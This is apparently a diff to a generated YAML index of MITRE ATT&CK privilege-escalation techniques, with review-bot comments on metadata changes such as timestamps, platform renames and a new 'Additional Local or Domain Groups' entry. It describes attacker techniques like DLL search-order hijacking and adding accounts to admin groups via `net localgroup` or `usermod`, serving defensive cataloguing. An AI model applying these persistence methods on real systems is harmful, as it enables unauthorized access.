- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
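Review bot: The T1053.003 fields deleted thirty-odd lines earlier (`type`, `id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`, `x_mitre_platforms`, `x_mitre_domains`) all reappear here or in the previous hunk, so no content is lost; the genuinely new lines are `revoked: false`, `x_mitre_remote_support: false`, `x_mitre_deprecated: false`, the `1.1` to `1.2` version bump and `x_mitre_attack_spec_version: 3.2.0`. Worth saying in the PR description, since a reader of the raw diff sees a 31-line deletion. Note also that the key order inside `external_references` flips (`url` now precedes `external_id` for the mitre-attack entry, `description` now precedes `url` for the SentinelOne one), another sign the generator does not fix key order.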
@@ -16743,6 +17011,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16753,6 +17022,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16761,13 +17031,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16809,9 +17079,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
@@ -17002,19 +17269,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -17030,8 +17296,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -17045,7 +17311,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -17071,6 +17337,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -17098,12 +17368,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -17129,7 +17398,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -17171,7 +17440,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17249,11 +17517,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17333,7 +17600,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
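Review bot: The new T1098.007 (Additional Local or Domain Groups) block is emitted with `atomic_tests: []` and without an `identifier:` line, while neighbouring entries such as T1546.013, T1053.003 and T1098.003 carry `identifier: <id>`; the rule for when that key is written is not obvious from this file, so confirm the new entry is correct to omit it. `x_mitre_detection` is an empty string, same as T1574.014 above, so that is not a generator problem. One remark on the upstream content being imported rather than on the PR: the description says Linux accounts may be added to "the sudoers group", but `sudoers` is the policy file; the groups that grant sudo by default are `sudo` or `wheel` depending on distribution. That belongs in an upstream ATT&CK issue, not in this generated file. Finally, the diff alignment makes `+ atomic_tests: []` look like the end of the T1053 block while the unchanged `atomic_tests: []` closes T1098.007; either way both entries end with an empty test list.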
@@ -17356,7 +17693,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17404,8 +17741,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -17437,7 +17772,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17492,13 +17827,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17559,9 +17892,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17570,7 +17903,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17623,7 +17955,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17644,12 +17976,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17752,7 +18083,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17852,12 +18182,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17870,7 +18199,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17883,7 +18211,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17913,7 +18240,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17940,7 +18268,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
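Review bot: the `modified` timestamp for T1547.005 goes backwards here, from '2021-04-29T14:49:39.188Z' to '2020-03-25T15:42:48.910Z', and the same regression recurs further down for T1543.004, T1546.005, T1574.006, T1546.012, T1055.013, T1574.005, T1546.008, T1055.004, T1546.009, T1055.002 and T1547.015, where the uniform '2023-05-09T14:00:00.188Z' / '2022-04-25T14:00:00.188Z' stamps are replaced by earlier per-object dates. Combined with `spec_version: '2.1'` being dropped from every technique block in this file, that looks like the index was regenerated from a different ATT&CK bundle than the previous run rather than from newer data. Please state in the PR description which bundle the generator now reads, so a deliberate source switch can be told apart from a stale or mixed cache.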
@@ -17966,13 +18294,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -18049,12 +18375,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18073,6 +18398,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -18080,7 +18406,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -18100,34 +18425,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -18163,6 +18490,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -18174,16 +18505,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -18219,12 +18546,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18232,14 +18559,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18254,6 +18580,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18262,18 +18589,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
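Review bot: the platform entries 'Azure AD', 'Office 365' and 'Google Workspace' are replaced by 'Office Suite' and 'Identity Provider' for T1078.001 here, and the same substitution repeats below for T1548, T1548.005, T1098.005 and T1098.001. Any per-platform index or filter that matches on the old platform strings will silently stop listing these techniques; check that platform-specific index generation is updated in the same change, or record it as a follow-up.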
@@ -18305,9 +18632,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18379,7 +18703,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18406,7 +18729,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18432,13 +18755,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18559,12 +18880,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
